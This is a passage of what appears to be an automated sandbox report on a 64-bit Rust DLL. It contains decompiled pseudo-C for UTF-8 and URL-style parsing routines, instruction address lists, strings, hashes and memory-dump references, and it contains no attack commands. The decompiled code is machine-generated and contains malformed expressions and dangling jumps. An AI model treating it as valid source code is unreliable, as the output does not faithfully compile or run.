				 *((long long*)(_t513 + 0x10)) =  *((long long*)(_t513 + 0x10)) + 1;
				if (_t629 - _t498 + _t606 != _t555 + 1) goto 0xf305304c;
				if ( *((intOrPtr*)(_t512 + 8)) == 0) goto 0xf3053082;
				HeapFree(??, ??, ??);
				_t500 =  *((intOrPtr*)(_t633 + 0x148));
				_t607 =  *((intOrPtr*)(_t633 + 0x150));
				_t632 =  *((intOrPtr*)(_t633 + 0x138));
				if (_t632 == 0) goto 0xf30530cb;
				_t514 =  *((intOrPtr*)(_t607 + 0x10));
				if ( *((intOrPtr*)(_t633 + 0x130)) == _t514) goto 0xf30530c4;
				E000007FE7FEF30F1E10();
				_t515 = _t514 + _t632;
				 *((long long*)(_t607 + 0x10)) = _t515;
				_t661 =  *((intOrPtr*)(_t633 + 0x190));
				if (_t661 == 0) goto 0xf30531f3;
				_t663 =  *((intOrPtr*)(_t633 + 0x180));
				_t609 = _t663 + _t661;
				_t592 = _t609;
				_t339 =  *((intOrPtr*)(_t609 - 1));
				if (_t339 < 0) goto 0xf305310a;
				goto 0xf3053160;
				if (sil - 0xc0 >= 0) goto 0xf3053131;
				_t320 =  *(_t592 - 3) & 0x000000ff;
				if (_t320 - 0xc0 >= 0) goto 0xf305313a;
				goto 0xf3053141;
				goto 0xf3053149;
				_t343 = _t339 & 0x3f | ( *(_t592 - 2) & 0x1f | ((_t320 & 0x0000003f | ( *(_t592 - 4) & 7) << 0x00000006) & 0x0000000f) << 0x00000006) << 0x00000006;
				if (_t343 == 0x110000) goto 0xf30531eb;
				if (_t515 - 9 - 5 >= 0) goto 0xf305316f;
				if (_t592 - 3 != _t663) goto 0xf30530f7;
				goto 0xf30531eb;
				if (_t343 == 0x20) goto 0xf3053168;
				if (_t343 - 0x80 < 0) goto 0xf30531c3;
				_t327 = _t343 >> 8;
				if (_t327 - 0x1f > 0) goto 0xf3053199;
				if (_t327 == 0) goto 0xf30531ad;
				if (_t327 != 0x16) goto 0xf30531c3;
				if (_t343 == 0x1680) goto 0xf3053168;
				goto 0xf30531c3;
				if (_t327 == 0x20) goto 0xf30531b9;
				if (_t327 != 0x30) goto 0xf30531c3;
				if (_t343 == 0x3000) goto 0xf3053168;
				goto 0xf30531c3;
				if (( *(_t500 + 0xf314ac08) & 0x00000001) != 0) goto 0xf3053168;
				goto 0xf30531c3;
				if (( *(_t500 + 0xf314ac08) & 0x00000002) != 0) goto 0xf3053168;
				_t593 = _t592 - _t663;
				if (_t661 - _t593 < 0) goto 0xf30531fd;
				if (_t593 == 0) goto 0xf30531f3;
				if (_t661 - _t593 <= 0) goto 0xf30532b0;
				if ( *((char*)(_t663 + _t593)) - 0xc0 >= 0) goto 0xf30531f6;
				goto 0xf30532b6;
				r9d = 0;
				goto 0xf30531f6;
				r9d = 0;
				 *((long long*)(_t633 + 0x190)) = _t593;
				 *((long long*)(_t633 + 0xe0)) = _t633 + 0x180;
				 *((long long*)(_t633 + 0xe8)) = 0x7fef3051250;
				_t654 = _t633 + 0x130;
				 *_t654 = 0xf314d790;
				 *((long long*)(_t654 + 8)) = 0xf314d790;
				 *((long long*)(_t654 + 0x10)) = 0;
				 *((long long*)(_t654 + 0x20)) = _t633 + 0xe0;
				 *((long long*)(_t654 + 0x28)) = 0xf314d790;
				if (E000007FE7FEF3054B50(0,  *((intOrPtr*)( *((intOrPtr*)(_t633 + 0x198)) + 0x20)),  *((intOrPtr*)( *((intOrPtr*)(_t633 + 0x198)) + 0x28)), _t654) == 0) goto 0xf3053278;
				if ( *((long long*)(_t633 + 0x188)) == 0) goto 0xf3053274;
				HeapFree(??, ??, ??);
				goto 0xf305329a;
				if ( *((long long*)(_t633 + 0x188)) == 0) goto 0xf3053298;
				HeapFree(??, ??, ??);
				return 0;
			}

0x7fef305270a
0x7fef3052712
0x7fef305271d
0x7fef3052720
0x7fef3052723
0x7fef3052726
0x7fef305272c
0x7fef3052733
0x7fef305273e
0x7fef305274b
0x7fef3052752
0x7fef305275c
0x7fef3052764
0x7fef305276f
0x7fef3052776
0x7fef305277e
0x7fef3052782
0x7fef305278a
0x7fef305278e
0x7fef305279b
0x7fef30527a1
0x7fef30527a5
0x7fef30527b3
0x7fef30527ba
0x7fef30527c0
0x7fef30527c6
0x7fef30527c9
0x7fef30527e2
0x7fef30527e9
0x7fef30527ec
0x7fef30527f6
0x7fef3052801
0x7fef3052805
0x7fef3052810
0x7fef3052819
0x7fef305281f
0x7fef305282c
0x7fef3052835
0x7fef305283f
0x7fef3052849
0x7fef3052850
0x7fef3052866
0x7fef305286d
0x7fef3052878
0x7fef305287b
0x7fef3052889
0x7fef3052890
0x7fef30528a8
0x7fef30528b6
0x7fef30528ba
0x7fef30528c8
0x7fef30528cf
0x7fef30528d6
0x7fef30528e4
0x7fef30528ef
0x7fef30528fa
0x7fef3052905
0x7fef3052911
0x7fef3052918
0x7fef3052927
0x7fef305292e
0x7fef305294a
0x7fef305295c
0x7fef3052962
0x7fef305296e
0x7fef3052976
0x7fef305297c
0x7fef3052983
0x7fef3052997
0x7fef305299a
0x7fef30529a7
0x7fef30529b0
0x7fef30529b2
0x7fef30529b8
0x7fef30529bd
0x7fef30529c2
0x7fef30529d1
0x7fef30529d7
0x7fef30529de
0x7fef30529e5
0x7fef30529e9
0x7fef30529f8
0x7fef30529fc
0x7fef3052a02
0x7fef3052a06
0x7fef3052a0a
0x7fef3052a15
0x7fef3052a1f
0x7fef3052a24
0x7fef3052a34
0x7fef3052a3a
0x7fef3052a4a
0x7fef3052a57
0x7fef3052a5d
0x7fef3052a6a
0x7fef3052a70
0x7fef3052a74
0x7fef3052a84
0x7fef3052a97
0x7fef3052a99
0x7fef3052a9d
0x7fef3052aaa
0x7fef3052aaf
0x7fef3052ab3
0x7fef3052ab6
0x7fef3052aba
0x7fef3052abe
0x7fef3052ac2
0x7fef3052aca
0x7fef3052ace
0x7fef3052ad6
0x7fef3052ad9
0x7fef3052ae4
0x7fef3052aeb
0x7fef3052af1
0x7fef3052afe
0x7fef3052b05
0x7fef3052b0f
0x7fef3052b15
0x7fef3052b24
0x7fef3052b2b
0x7fef3052b36
0x7fef3052b3d
0x7fef3052b4c
0x7fef3052b53
0x7fef3052b59
0x7fef3052b6a
0x7fef3052b6f
0x7fef3052b7d
0x7fef3052b89
0x7fef3052b99
0x7fef3052b9e
0x7fef3052ba9
0x7fef3052bb6
0x7fef3052bbd
0x7fef3052bc1
0x7fef3052bc5
0x7fef3052bc9
0x7fef3052bd0
0x7fef3052bd7
0x7fef3052bf0
0x7fef3052bf4
0x7fef3052bfc
0x7fef3052c03
0x7fef3052c0a
0x7fef3052c0e
0x7fef3052c12
0x7fef3052c16
0x7fef3052c1d
0x7fef3052c24
0x7fef3052c26
0x7fef3052c2c
0x7fef3052c30
0x7fef3052c37
0x7fef3052c3f
0x7fef3052c41
0x7fef3052c4c
0x7fef3052c55
0x7fef3052c5c
0x7fef3052c63
0x7fef3052c6d
0x7fef3052c76
0x7fef3052c7a
0x7fef3052c7e
0x7fef3052c82
0x7fef3052c9e
0x7fef3052caa
0x7fef3052cb0
0x7fef3052cb6
0x7fef3052cc8
0x7fef3052cce
0x7fef3052cd4
0x7fef3052cdb
0x7fef3052cea
0x7fef3052cf5
0x7fef3052d02
0x7fef3052d06
0x7fef3052d1f
0x7fef3052d2b
0x7fef3052d31
0x7fef3052d45
0x7fef3052d4c
0x7fef3052d56
0x7fef3052d71
0x7fef3052d78
0x7fef3052d7b
0x7fef3052d85
0x7fef3052d89
0x7fef3052d90
0x7fef3052d94
0x7fef3052d9f
0x7fef3052db0
0x7fef3052db9
0x7fef3052dbd
0x7fef3052dc5
0x7fef3052dcf
0x7fef3052dd5
0x7fef3052de0
0x7fef3052de7
0x7fef3052dea
0x7fef3052df4
0x7fef3052df8
0x7fef3052dfc
0x7fef3052e00
0x7fef3052e07
0x7fef3052e0d
0x7fef3052e16
0x7fef3052e1c
0x7fef3052e2f
0x7fef3052e36
0x7fef3052e3e
0x7fef3052e42
0x7fef3052e46
0x7fef3052e4a
0x7fef3052e51
0x7fef3052e54
0x7fef3052e5b
0x7fef3052e5f
0x7fef3052e6e
0x7fef3052e77
0x7fef3052e7a
0x7fef3052e81
0x7fef3052e87
0x7fef3052e8b
0x7fef3052e8d
0x7fef3052e90
0x7fef3052e97
0x7fef3052ea1
0x7fef3052ea7
0x7fef3052ebd
0x7fef3052ec3
0x7fef3052ee0
0x7fef3052ee5
0x7fef3052eec
0x7fef3052ef3
0x7fef3052efb
0x7fef3052f1c
0x7fef3052f27
0x7fef3052f29
0x7fef3052f40
0x7fef3052f42
0x7fef3052f58
0x7fef3052f5e
0x7fef3052f67
0x7fef3052f6f
0x7fef3052f7c
0x7fef3052f82
0x7fef3052f97
0x7fef3052fa1
0x7fef3052faf
0x7fef3052fb4
0x7fef3052fbe
0x7fef3052fc1
0x7fef3052fc8
0x7fef3052fcb
0x7fef3052fcf
0x7fef3052fdd
0x7fef3052fe9
0x7fef3052ff0
0x7fef3052ff2
0x7fef3052ff9
0x7fef3053015
0x7fef305301b
0x7fef3053026
0x7fef305302c
0x7fef3053031
0x7fef3053038
0x7fef305303f
0x7fef305304f
0x7fef3053055
0x7fef3053058
0x7fef3053062
0x7fef305306e
0x7fef305307c
0x7fef3053082
0x7fef3053089
0x7fef3053097
0x7fef30530a1
0x7fef30530a3
0x7fef30530b1
0x7fef30530bf
0x7fef30530c4
0x7fef30530c7
0x7fef30530d2
0x7fef30530dc
0x7fef30530e5
0x7fef30530ec
0x7fef30530f7
0x7fef30530fa
0x7fef30530ff
0x7fef3053108
0x7fef3053112
0x7fef3053114
0x7fef305311a
0x7fef305312f
0x7fef3053138
0x7fef3053152
0x7fef305315a
0x7fef3053166
0x7fef305316b
0x7fef305316d
0x7fef3053172
0x7fef305317a
0x7fef305317e
0x7fef3053184
0x7fef3053188
0x7fef305318d
0x7fef3053195
0x7fef3053197
0x7fef305319c
0x7fef30531a1
0x7fef30531a9
0x7fef30531ab
0x7fef30531b5
0x7fef30531b7
0x7fef30531c1
0x7fef30531c3
0x7fef30531cc
0x7fef30531d1
0x7fef30531d6
0x7fef30531e4
0x7fef30531e6
0x7fef30531eb
0x7fef30531f1
0x7fef30531f3
0x7fef30531f6
0x7fef30531fd
0x7fef305320b
0x7fef305321a
0x7fef3053228
0x7fef3053230
0x7fef3053234
0x7fef3053243
0x7fef3053247
0x7fef3053252
0x7fef305325c
0x7fef305326e
0x7fef3053276
0x7fef3053280
0x7fef3053292
0x7fef30532af

APIs

HeapFree.KERNEL32 ref: 000007FEF305326E
HeapFree.KERNEL32 ref: 000007FEF3053292

Strings

disabled backtraceunsupported backtrace, xrefs: 000007FEF3052A26
assertion failed: self.is_char_boundary(n), xrefs: 000007FEF3053350
called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 000007FEF30527FA, 000007FEF3052882, 000007FEF3052D89
SStack backtrace:, xrefs: 000007FEF3052E4A

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap
String ID: SStack backtrace:$assertion failed: self.is_char_boundary(n)$called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value$disabled backtraceunsupported backtrace
API String ID: 3298025750-3439611746
Opcode ID: d260566bdd47db831b37b9d143e5f9533845001ec278ae5843e0570aa5428f05
Instruction ID: cdf30ee49bb69e0d4bd6838b424472595d26bc73f64e3a4ccbc29743a30c5428
Opcode Fuzzy Hash: d260566bdd47db831b37b9d143e5f9533845001ec278ae5843e0570aa5428f05
Instruction Fuzzy Hash: 15726E72A19BC289EBE18F25D8543E933E5F748788F444627DA8D47BA8DF38D259D300

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30C189F Relevance: 10.0, APIs: 4, Strings: 2, Instructions: 1036
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E000007FE7FEF30C189F(void* __esp, long long __rcx, long long __rdx, long long __r8, long long __r9, void* __r10, long long __r11) {
				void* _t272;
				signed int _t277;
				signed int _t279;
				void* _t288;
				void* _t296;
				signed char _t297;
				signed int _t305;
				signed char _t307;
				signed int _t317;
				void* _t320;
				void* _t321;
				signed long long _t329;
				signed int _t336;
				signed char _t337;
				signed char _t344;
				signed int _t355;
				int _t360;
				signed int _t368;
				signed int _t387;
				signed int _t409;
				signed int _t412;
				signed int _t422;
				void* _t423;
				void* _t450;
				void* _t457;
				void* _t470;
				char _t481;
				void* _t486;
				void* _t493;
				int _t502;
				void* _t508;
				intOrPtr _t519;
				void* _t525;
				void* _t526;
				intOrPtr _t527;
				void* _t529;
				unsigned int _t556;
				unsigned long long _t560;
				signed long long _t565;
				signed long long _t569;
				signed long long _t573;
				signed long long _t578;
				signed long long _t587;
				signed long long _t592;
				signed long long _t596;
				int* _t599;
				void* _t605;
				signed long long _t606;
				signed long long _t610;
				char* _t611;
				int* _t612;
				intOrPtr* _t613;
				void* _t614;
				signed char* _t617;
				long long* _t631;
				signed long long _t639;
				long long* _t655;
				void* _t656;
				unsigned int _t670;
				signed long long _t674;
				signed long long _t682;
				int* _t688;
				unsigned long long _t692;
				long long _t694;
				void* _t695;
				unsigned long long _t700;
				int* _t709;
				int _t714;
				int* _t715;
				long long _t718;
				intOrPtr* _t719;
				intOrPtr* _t721;
				unsigned long long _t722;
				intOrPtr* _t723;
				void* _t724;
				signed long long _t728;
				signed char* _t731;
				unsigned long long _t734;
				signed long long _t738;
				int* _t741;
				int* _t742;
				int _t744;
				unsigned long long _t746;
				void* _t747;
				long long* _t757;
				long long* _t758;
				long long _t763;
				void* _t768;
				long long* _t772;
				int** _t775;
				long long _t780;
				long long _t782;
				intOrPtr* _t796;
				signed long long _t797;
				void* _t802;
				unsigned long long _t804;

				_t770 = __r11;
				_t768 = __r10;
				_t763 = __r9;
				_t738 = __r9;
				_t718 = __rdx;
				_t782 = __rcx;
				if ( *(__rdx + 0x10) !=  *((intOrPtr*)(__rdx + 8))) goto 0xf30c18d4;
				E000007FE7FEF30A62B2( *(__rdx + 0x10) -  *((intOrPtr*)(__rdx + 8)), __rdx,  *(__rdx + 0x10));
				 *((char*)( *((intOrPtr*)(__rdx)) +  *(__rdx + 0x10))) = 0x2f;
				_t670 =  *(__rdx + 0x10) + 1;
				 *(__rdx + 0x10) = _t670;
				if (_t670 !=  *((intOrPtr*)(__rdx + 8))) goto 0xf30c18f8;
				E000007FE7FEF30A62B2(_t670 -  *((intOrPtr*)(__rdx + 8)), __rdx, _t670);
				r15b =  *((intOrPtr*)(_t747 + 0x1e0));
				 *((char*)( *((intOrPtr*)(__rdx)) +  *(__rdx + 0x10))) = 0x2f;
				_t556 =  *(__rdx + 0x10) + 1;
				 *(_t747 + 0x140) = _t556;
				 *(__rdx + 0x10) = _t556;
				_t772 = _t747 + 0x148;
				 *_t772 = __r8;
				 *((long long*)(_t772 + 8)) = __r9;
				 *(_t747 + 0x78) = _t556;
				_t272 = E000007FE7FEF30BDE7C(_t772);
				if (_t272 - 0x3f > 0) goto 0xf30c1952;
				if (_t272 == 0x23) goto 0xf30c19bf;
				if (_t272 == 0x2f) goto 0xf30c19bf;
				if (_t272 != 0x3f) goto 0xf30c19b8;
				goto 0xf30c19bf;
				if (_t272 == 0x40) goto 0xf30c1964;
				if (_t272 != 0x5c) goto 0xf30c197d;
				if (r15b == 2) goto 0xf30c19b8;
				goto 0xf30c19bf;
				if ( *(_t747 + 0x78) == 0) goto 0xf30c1986;
				if ( *((intOrPtr*)(_t718 + 0x30)) == 0) goto 0xf30c1998;
				goto 0xf30c1995;
				if (_t272 != 0x110000) goto 0xf30c19b8;
				goto 0xf30c19bf;
				if ( *((intOrPtr*)(_t718 + 0x30)) == 0) goto 0xf30c1998;
				 *((intOrPtr*)( *((intOrPtr*)(_t718 + 0x38)) + 0x28))();
				 *(_t747 + 0x78) =  *(_t747 + 0x148);
				_t560 =  *((intOrPtr*)(_t747 + 0x150));
				 *(_t747 + 0x90) = _t560;
				r13d = 0;
				goto 0xf30c1934;
				 *((long long*)(_t747 + 0x70)) = _t718;
				 *((long long*)(_t747 + 0x128)) = __rcx;
				if ( *(_t747 + 0x78) == 0) goto 0xf30c1c49;
				if (r13d == 0) goto 0xf30c1c82;
				if (r13d <= 0) goto 0xf30c1ccc;
				r10d = 0x901;
				r12d = 0x2600;
				 *(_t747 + 0x68) = 0;
				r9d = 0;
				 *(_t747 + 0x100) = _t560;
				r15d = 0;
				if (__r8 == _t738) goto 0xf30c29c1;
				r11d = r13d;
				_t694 = __r8;
				_t337 =  *((intOrPtr*)(__r8));
				r8d = _t337 & 0x000000ff;
				if (r8b < 0) goto 0xf30c1a2c;
				goto 0xf30c1a8a;
				if (r8b - 0xdf <= 0) goto 0xf30c1a72;
				r8d =  *(__r8 + 2) & 0x000000ff;
				_t368 = ( *(__r8 + 1) & 0x3f) << 6;
				r8d = r8d & 0x0000003f;
				r8d = r8d | _t368;
				if (_t337 - 0xf0 < 0) goto 0xf30c1a80;
				_t277 = (r8d & 7) << 0x12;
				r8d = r8d << 6;
				r8d =  *(__r8 + 3) & 0x3f | r8d | _t277;
				goto 0xf30c1a8a;
				_t279 = _t277 << 0x00000006 | _t368;
				r8d = _t279;
				goto 0xf30c1a8a;
				_t38 = _t694 + 3; // 0x3
				_t605 = _t38;
				r8d = r8d | _t279 << 0x0000000c;
				_t450 = r8d - 0xd;
				if (_t450 > 0) goto 0xf30c1aa7;
				asm("inc ebp");
				if (_t450 >= 0) goto 0xf30c1aa7;
				_t695 = _t605;
				if (_t605 != _t738) goto 0xf30c1a1b;
				goto 0xf30c29c1;
				if (r8d == 0x110000) goto 0xf30c29c1;
				r14d = 1;
				if (r8d - 0x80 < 0) goto 0xf30c1ae9;
				r14d = 2;
				if (r8d - 0x800 < 0) goto 0xf30c1ae9;
				r14d = 4;
				asm("dec ecx");
				if (__rcx - _t738 - _t695 >= 0) goto 0xf30c1afa;
				_t457 =  *((char*)(_t695 + __rcx)) - 0xbf;
				if (_t457 > 0) goto 0xf30c1b00;
				goto 0xf30c29db;
				if (_t457 != 0) goto 0xf30c29db;
				if (r8d == 0x110000) goto 0xf30c29c1;
				_t40 = _t770 - 1; // -1
				r13d = _t40;
				if (r8d != 0x3a) goto 0xf30c1b92;
				if (r15d == 1) goto 0xf30c1b92;
				_t719 =  *((intOrPtr*)(_t747 + 0x70));
				_t674 =  *((intOrPtr*)(_t719 + 0x10));
				_t699 =  !=  ? _t768 : _t674 << 0x00000020 | 0x00000900;
				if (dil != 0) goto 0xf30c1d0e;
				_t700 = ( !=  ? _t768 : _t674 << 0x00000020 | 0x00000900) >> 0x20;
				if (r11d - 2 < 0) goto 0xf30c1d1b;
				 *(_t747 + 0x100) = _t700;
				if (_t674 !=  *((intOrPtr*)(_t719 + 8))) goto 0xf30c1b79;
				E000007FE7FEF30A62B2(_t674 -  *((intOrPtr*)(_t719 + 8)), _t719, _t674);
				r10d = 0x901;
				 *((char*)( *_t719 +  *((intOrPtr*)(_t719 + 0x10)))) = 0x3a;
				 *((long long*)(_t719 + 0x10)) =  *((long long*)(_t719 + 0x10)) + 1;
				r9b = 1;
				r15d = 1;
				goto 0xf30c1a0c;
				_t284 =  ==  ? 1 :  *(_t747 + 0x68) & 0x000000ff;
				 *(_t747 + 0x68) =  ==  ? 1 :  *(_t747 + 0x68) & 0x000000ff;
				 *(_t747 + 0x20) = _t738;
				 *((long long*)(_t747 + 0x88)) = _t763;
				 *((long long*)(_t747 + 0x138)) = __r11;
				E000007FE7FEF30C395D( *((intOrPtr*)( *((intOrPtr*)(_t747 + 0x70)) + 0x30)),  *((intOrPtr*)( *((intOrPtr*)(_t747 + 0x70)) + 0x38)), __r8, _t605);
				 *(_t747 + 0xb0) = _t700;
				 *((long long*)(_t747 + 0xb8)) = _t782;
				 *((long long*)(_t747 + 0xc0)) = 0xf314d168;
				_t60 = _t747 + 0xb0; // 0x26b0
				E000007FE7FEF30623E3( *((intOrPtr*)(_t747 + 0x70)), _t60);
				r10d = 0x901;
				if ( *((intOrPtr*)(_t747 + 0x138)) - 2 >= 0) goto 0xf30c1a0c;
				_t721 =  *((intOrPtr*)(_t747 + 0x70));
				if (r15d != 0) goto 0xf30c1d2c;
				goto 0xf30c1cde;
				_t565 =  *((intOrPtr*)(_t721 + 0x10));
				_t702 =  ==  ? _t565 << 0x00000020 | 0x00000900 :  *(_t747 + 0x100);
				if (dil != 0) goto 0xf30c1d93;
				_t703 = ( ==  ? _t565 << 0x00000020 | 0x00000900 :  *(_t747 + 0x100)) >> 0x20;
				goto 0xf30c1d9b;
				_t631 = _t747 + 0xb0;
				 *_t631 =  *(_t747 + 0x78);
				 *((long long*)(_t631 + 8)) =  *(_t747 + 0x90);
				_t470 = E000007FE7FEF30BDE7C(_t631) - 0x3f;
				if (_t470 > 0) goto 0xf30c1d57;
				asm("dec eax");
				if (_t470 >= 0) goto 0xf30c1d57;
				r15d = 0;
				goto 0xf30c1d9b;
				r9d = 0;
				_t569 =  *((intOrPtr*)(_t721 + 0x10));
				_t704 =  ==  ? _t569 << 0x00000020 | 0x00000900 : ( ==  ? _t565 << 0x00000020 | 0x00000900 :  *(_t747 + 0x100)) >> 0x20;
				if (dil != 0) goto 0xf30c1d93;
				_t705 = ( ==  ? _t569 << 0x00000020 | 0x00000900 : ( ==  ? _t565 << 0x00000020 | 0x00000900 :  *(_t747 + 0x100)) >> 0x20) >> 0x20;
				goto 0xf30c1d2c;
				r15d = 0;
				goto 0xf30c1d9b;
				_t780 =  *(_t747 + 0x90);
				if ((( *(_t747 + 0x68) | r9b) & 0x00000001) == 0) goto 0xf30c1d9b;
				if ( *((intOrPtr*)(_t721 + 0x10)) !=  *((intOrPtr*)(_t721 + 8))) goto 0xf30c1d4a;
				_t288 = E000007FE7FEF30A62B2( *((intOrPtr*)(_t721 + 0x10)) -  *((intOrPtr*)(_t721 + 8)), _t721,  *((intOrPtr*)(_t721 + 0x10)));
				 *((char*)( *_t721 +  *((intOrPtr*)(_t721 + 0x10)))) = 0x40;
				 *((long long*)(_t721 + 0x10)) =  *((long long*)(_t721 + 0x10)) + 1;
				goto 0xf30c1d9b;
				if (_t288 != 0x110000) goto 0xf30c206a;
				_t573 =  *((intOrPtr*)(_t721 + 0x10));
				_t706 =  ==  ? _t573 << 0x00000020 | 0x00000900 : ( ==  ? _t569 << 0x00000020 | 0x00000900 : ( ==  ? _t565 << 0x00000020 | 0x00000900 :  *(_t747 + 0x100)) >> 0x20) >> 0x20;
				if (dil != 0) goto 0xf30c1d93;
				_t707 = ( ==  ? _t573 << 0x00000020 | 0x00000900 : ( ==  ? _t569 << 0x00000020 | 0x00000900 : ( ==  ? _t565 << 0x00000020 | 0x00000900 :  *(_t747 + 0x100)) >> 0x20) >> 0x20) >> 0x20;
				_t796 =  *(_t747 + 0x78);
				goto 0xf30c1d9b;
				r15d = 0;
				if (_t796 == 0) goto 0xf30c1f7a;
				_t722 =  *((intOrPtr*)(_t721 + 0x10));
				_t639 = _t722 << 0x00000020 | 0x00000900;
				_t578 =  ==  ? _t639 : _t722 >> 0x20;
				r14b = 9;
				if (0x901 != 0) goto 0xf30c272d;
				 *((long long*)(_t747 + 0xa0)) = _t796;
				 *((long long*)(_t747 + 0xa8)) = _t780;
				_t481 =  *((char*)(_t747 + 0x1e0));
				 *(_t747 + 0x100) = ( ==  ? _t573 << 0x00000020 | 0x00000900 : ( ==  ? _t569 << 0x00000020 | 0x00000900 : ( ==  ? _t565 << 0x00000020 | 0x00000900 :  *(_t747 + 0x100)) >> 0x20) >> 0x20) >> 0x20;
				 *(_t747 + 0x78) = _t578;
				if (_t481 == 0) goto 0xf30c1f82;
				 *(_t747 + 0x90) = _t722;
				if (_t481 == 0) goto 0xf30c2029;
				r10d = 0;
				r9d = 0x2600;
				r14d = 0;
				_t723 = _t796;
				_t344 =  *_t723;
				if (dil < 0) goto 0xf30c1e3f;
				_t724 = _t723 + 1;
				goto 0xf30c1e94;
				if (dil - 0xdf <= 0) goto 0xf30c1e7e;
				if (_t344 - 0xf0 < 0) goto 0xf30c1e8b;
				goto 0xf30c1e94;
				goto 0xf30c1e94;
				_t409 = (_t344 & 7) << 0x00000012 << 0x00000006 | ( *(_t724 + 1) & 0x3f) << 0x00000006 | ((_t344 & 7) << 0x00000012 << 0x00000006 | ( *(_t724 + 1) & 0x3f) << 0x00000006) << 0x0000000c;
				if (_t409 - 0x5a > 0) goto 0xf30c1eaf;
				_t486 = _t409 - 0x3f;
				if (_t486 > 0) goto 0xf30c1f00;
				asm("dec ecx");
				if (_t486 >= 0) goto 0xf30c1eca;
				goto 0xf30c1f27;
				if (_t409 - 0x5c > 0) goto 0xf30c1edb;
				if (_t409 == 0x5b) goto 0xf30c1ee8;
				if (_t409 != 0x5c) goto 0xf30c1f00;
				if ( *((char*)(_t747 + 0x1e0)) == 2) goto 0xf30c1ed6;
				goto 0xf30c1f33;
				if (_t639 != 0x3a) goto 0xf30c1ef0;
				if ((r10b & 0x00000001) == 0) goto 0xf30c1f33;
				goto 0xf30c1f27;
				_t493 = _t409 - 0x5d;
				if (_t493 != 0) goto 0xf30c1ef8;
				r10d = 0;
				goto 0xf30c1f27;
				r10b = 1;
				goto 0xf30c1f27;
				asm("dec ecx");
				if (_t493 >= 0) goto 0xf30c1f00;
				goto 0xf30c1f33;
				if (_t409 == 0x110000) goto 0xf30c1f33;
				if (_t409 - 0x80 < 0) goto 0xf30c1f27;
				if (_t409 - 0x800 < 0) goto 0xf30c1f27;
				asm("dec eax");
				if (_t724 + 9 != _t780) goto 0xf30c1e30;
				if (1 == 0) goto 0xf30c202e;
				_t606 = _t747 + 0xb0;
				 *_t606 = 1;
				asm("xorps xmm0, xmm0");
				asm("movups [ebx+0x8], xmm0");
				E000007FE7FEF30BDF42(_t606, _t747 + 0xa0, _t782 + 4);
				_t728 =  *_t606;
				r13d = 0;
				_t797 = _t728;
				goto 0xf30c2088;
				r14d = _t409;
				goto 0xf30c272d;
				_t709 = _t747 + 0xb0;
				_t682 = _t797;
				E000007FE7FEF30C44DE(1, _t709, _t682, _t780);
				r14b =  *_t709;
				if (_t709[6] == 2) goto 0xf30c272d;
				 *(_t747 + 0x90) = _t728;
				_t741 = _t747 + 0xb0;
				 *((long long*)(_t747 + 0x88)) = _t741[8];
				E000007FE7FEF30BE068((_t741[1] & 0x000000ff) << 0x10, _t741[0], _t409, _t741, (_t682 | _t606 << 0x00000020) << 0x00000008 | _t578, _t741[4]);
				r12b =  *_t741;
				if (r12b != 3) goto 0xf30c22cc;
				r14b =  *(_t747 + 0xb1);
				_t502 = _t741[2];
				if (_t502 == 0) goto 0xf30c272d;
				r12b = 3;
				goto 0xf30c2380;
				r14d = 0;
				if (_t502 == 0) goto 0xf30c204d;
				_t296 = E000007FE7FEF30BDE7C(_t747 + 0xa0);
				if (_t296 != 0x110000) goto 0xf30c2039;
				r13b = 1;
				if (_t741 == 0) goto 0xf30c2066;
				if (_t741 - _t780 - _t796 >= 0) goto 0xf30c2082;
				if ( *((char*)(_t741 + _t797)) - 0xbf > 0) goto 0xf30c2088;
				goto 0xf30c2a25;
				goto 0xf30c2088;
				if (r15b == 2) goto 0xf30c1d62;
				_t508 = _t296 - 0x5c;
				if (_t508 == 0) goto 0xf30c1cc2;
				goto 0xf30c1d62;
				if (_t508 != 0) goto 0xf30c2a25;
				_t297 =  *((intOrPtr*)(_t747 + 0x1e0));
				if (_t297 == 1) goto 0xf30c2140;
				if ((_t297 & 0x000000ff) != 2) goto 0xf30c2149;
				_t610 = _t797;
				if (_t741 == 0) goto 0xf30c21e9;
				if ( *_t610 != 0x5b) goto 0xf30c21e9;
				r14b = 4;
				if ( *((char*)(_t610 + _t741 - 1)) != 0x5d) goto 0xf30c22b0;
				if (_t741 - 2 < 0) goto 0xf30c2a3f;
				if ( *((char*)(_t797 + 1)) - 0xbf <= 0) goto 0xf30c2a3f;
				_t742 =  &(_t741[0]);
				_t611 = _t747 + 0xb0;
				E000007FE7FEF30BEB83(_t611, _t797 + 1, _t742, _t768, __r11);
				if ( *_t611 != 0) goto 0xf30c2168;
				r14b =  *(_t747 + 0xb1);
				 *(_t747 + 0x98) =  *(_t747 + 0xb2);
				 *(_t747 + 0x9c) =  *(_t747 + 0xb6) & 0x0000ffff;
				 *(_t747 + 0x68) = _t578;
				r12b = 2;
				goto 0xf30c2846;
				if (_t742 == 0) goto 0xf30c2772;
				_t612 = _t747 + 0xb0;
				E000007FE7FEF30BE068((_t741[1] & 0x000000ff) << 0x10, _t741[0], _t409, _t612,  *((intOrPtr*)(_t747 + 0xb8)), _t742);
				r12b =  *_t612;
				if (r12b != 3) goto 0xf30c2175;
				r14b =  *(_t747 + 0xb1);
				goto 0xf30c22b0;
				r14b =  *(_t747 + 0xb1);
				 *(_t747 + 0x80) =  *(_t747 + 0xb2);
				_t305 =  *(_t747 + 0xb6) & 0x0000ffff;
				 *(_t747 + 0x84) = _t305;
				 *(_t747 + 0x68) =  *((intOrPtr*)(_t747 + 0xc0));
